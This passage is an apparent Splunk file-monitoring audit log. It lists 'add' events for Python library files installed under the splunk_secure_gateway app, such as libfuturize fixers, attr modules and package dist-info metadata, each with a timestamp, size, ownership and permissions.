action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_raise.py", isdir=0, size=3884, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.335, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_print_with_import.py", isdir=0, size=735, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.331, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_print.py", isdir=0, size=3384, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.328, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_order___future__imports.py", isdir=0, size=829, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.323, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_oldstr_wrap.py", isdir=0, size=1214, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.319, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_object.py", isdir=0, size=407, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.315, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_next_call.py", isdir=0, size=3158, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.312, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_metaclass.py", isdir=0, size=9568, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.308, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_input.py", isdir=0, size=687, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.305, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_future_standard_library_urllib.py", isdir=0, size=1001, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.300, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_future_standard_library.py", isdir=0, size=733, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.297, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_future_builtins.py", isdir=0, size=2027, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.292, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_execfile.py", isdir=0, size=921, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.287, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_division_safe.py", isdir=0, size=3292, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.284, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_division.py", isdir=0, size=228, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.279, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_cmp.py", isdir=0, size=701, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.275, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_bytes.py", isdir=0, size=685, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.270, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_basestring.py", isdir=0, size=394, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.265, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_add__future__imports_except_unicode_literals.py", isdir=0, size=662, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.261, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_absolute_import.py", isdir=0, size=3140, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.257, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/fix_UserDict.py", isdir=0, size=3840, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.252, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes/__init__.py", isdir=0, size=5236, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.046, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/main.py", isdir=0, size=13733, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.040, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixes", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:23.036, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/fixer_util.py", isdir=0, size=17494, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:23.031, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize/__init__.py", isdir=0, size=31, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.926, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_python_sdk-1.6.3.dist-info/top_level.txt", isdir=0, size=13, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.922, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_python_sdk-1.6.3.dist-info/WHEEL", isdir=0, size=92, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.918, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_python_sdk-1.6.3.dist-info/REQUESTED", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.913, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_python_sdk-1.6.3.dist-info/RECORD", isdir=0, size=17137, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.908, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_python_sdk-1.6.3.dist-info/METADATA", isdir=0, size=5877, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.904, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_python_sdk-1.6.3.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.899, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/__pycache__/zipp.cpython-37.pyc", isdir=0, size=9593, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:22.896, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/__pycache__/typing_extensions.cpython-37.pyc", isdir=0, size=69716, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:22.891, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/__pycache__/semver.cpython-37.pyc", isdir=0, size=35076, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:22.887, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp-3.7.4.post0.dist-info/top_level.txt", isdir=0, size=8, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.881, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp-3.7.4.post0.dist-info/WHEEL", isdir=0, size=112, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.877, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp-3.7.4.post0.dist-info/REQUESTED", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.872, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp-3.7.4.post0.dist-info/RECORD", isdir=0, size=9659, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.868, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp-3.7.4.post0.dist-info/METADATA", isdir=0, size=38836, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.864, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp-3.7.4.post0.dist-info/LICENSE.txt", isdir=0, size=11321, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.860, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp-3.7.4.post0.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.753, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/six-1.15.0.dist-info/top_level.txt", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.750, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/six-1.15.0.dist-info/WHEEL", isdir=0, size=110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.745, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/six-1.15.0.dist-info/RECORD", isdir=0, size=560, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.742, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/six-1.15.0.dist-info/METADATA", isdir=0, size=1795, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.737, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/six-1.15.0.dist-info/LICENSE", isdir=0, size=1066, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.733, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/six-1.15.0.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.628, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future-0.18.2.dist-info/top_level.txt", isdir=0, size=38, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.624, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future-0.18.2.dist-info/entry_points.txt", isdir=0, size=89, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.621, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future-0.18.2.dist-info/WHEEL", isdir=0, size=92, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.617, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future-0.18.2.dist-info/RECORD", isdir=0, size=31208, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.612, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future-0.18.2.dist-info/METADATA", isdir=0, size=3703, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.608, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future-0.18.2.dist-info/LICENSE.txt", isdir=0, size=1083, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.605, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future-0.18.2.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.600, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/zipp-3.4.1.dist-info/top_level.txt", isdir=0, size=5, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.595, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/zipp-3.4.1.dist-info/WHEEL", isdir=0, size=92, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.592, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/zipp-3.4.1.dist-info/RECORD", isdir=0, size=560, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.588, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/zipp-3.4.1.dist-info/METADATA", isdir=0, size=2087, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.585, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/zipp-3.4.1.dist-info/LICENSE", isdir=0, size=1050, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.581, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/zipp-3.4.1.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.477, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet-4.0.0.dist-info/top_level.txt", isdir=0, size=8, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.472, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet-4.0.0.dist-info/entry_points.txt", isdir=0, size=60, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.469, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet-4.0.0.dist-info/WHEEL", isdir=0, size=110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.465, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet-4.0.0.dist-info/RECORD", isdir=0, size=6348, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.461, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet-4.0.0.dist-info/METADATA", isdir=0, size=3526, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.457, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet-4.0.0.dist-info/LICENSE", isdir=0, size=26432, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.453, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet-4.0.0.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.449, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/idna-2.10.dist-info/top_level.txt", isdir=0, size=5, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.446, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/idna-2.10.dist-info/WHEEL", isdir=0, size=110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.442, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/idna-2.10.dist-info/RECORD", isdir=0, size=1396, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.438, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/idna-2.10.dist-info/METADATA", isdir=0, size=9104, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.435, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/idna-2.10.dist-info/LICENSE.rst", isdir=0, size=1565, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.431, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/idna-2.10.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.327, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/__pycache__/validators.cpython-37.pyc", isdir=0, size=11647, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:22.323, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/__pycache__/setters.cpython-37.pyc", isdir=0, size=1583, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:22.317, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/__pycache__/filters.cpython-37.pyc", isdir=0, size=1732, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:22.312, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/__pycache__/exceptions.cpython-37.pyc", isdir=0, size=3280, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:22.308, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/__pycache__/converters.cpython-37.pyc", isdir=0, size=2340, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:22.304, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/__pycache__/_version_info.cpython-37.pyc", isdir=0, size=2391, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:22.300, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/__pycache__/_next_gen.cpython-37.pyc", isdir=0, size=3377, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:22.296, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/__pycache__/_make.cpython-37.pyc", isdir=0, size=67187, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:22.292, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/__pycache__/_funcs.cpython-37.pyc", isdir=0, size=9667, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:22.288, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/__pycache__/_config.cpython-37.pyc", isdir=0, size=715, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:22.282, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/__pycache__/_compat.cpython-37.pyc", isdir=0, size=5869, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:22.275, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/__pycache__/__init__.cpython-37.pyc", isdir=0, size=1744, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:22.169, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/validators.pyi", isdir=0, size=1868, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.164, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/validators.py", isdir=0, size=11497, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.158, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/setters.pyi", isdir=0, size=567, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.154, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/setters.py", isdir=0, size=1434, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.149, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/py.typed", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.145, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/filters.pyi", isdir=0, size=214, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.141, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/filters.py", isdir=0, size=1098, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.137, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/exceptions.pyi", isdir=0, size=539, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.133, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/exceptions.py", isdir=0, size=1950, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.127, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/converters.pyi", isdir=0, size=380, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.123, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/converters.py", isdir=0, size=2214, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.119, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/_version_info.pyi", isdir=0, size=209, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.113, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/_version_info.py", isdir=0, size=2162, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.109, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/_next_gen.py", isdir=0, size=4138, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.105, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/_make.py", isdir=0, size=88313, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.100, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/_funcs.py", isdir=0, size=13081, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.097, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/_config.py", isdir=0, size=514, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.093, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/_compat.py", isdir=0, size=7308, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:22.088, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", 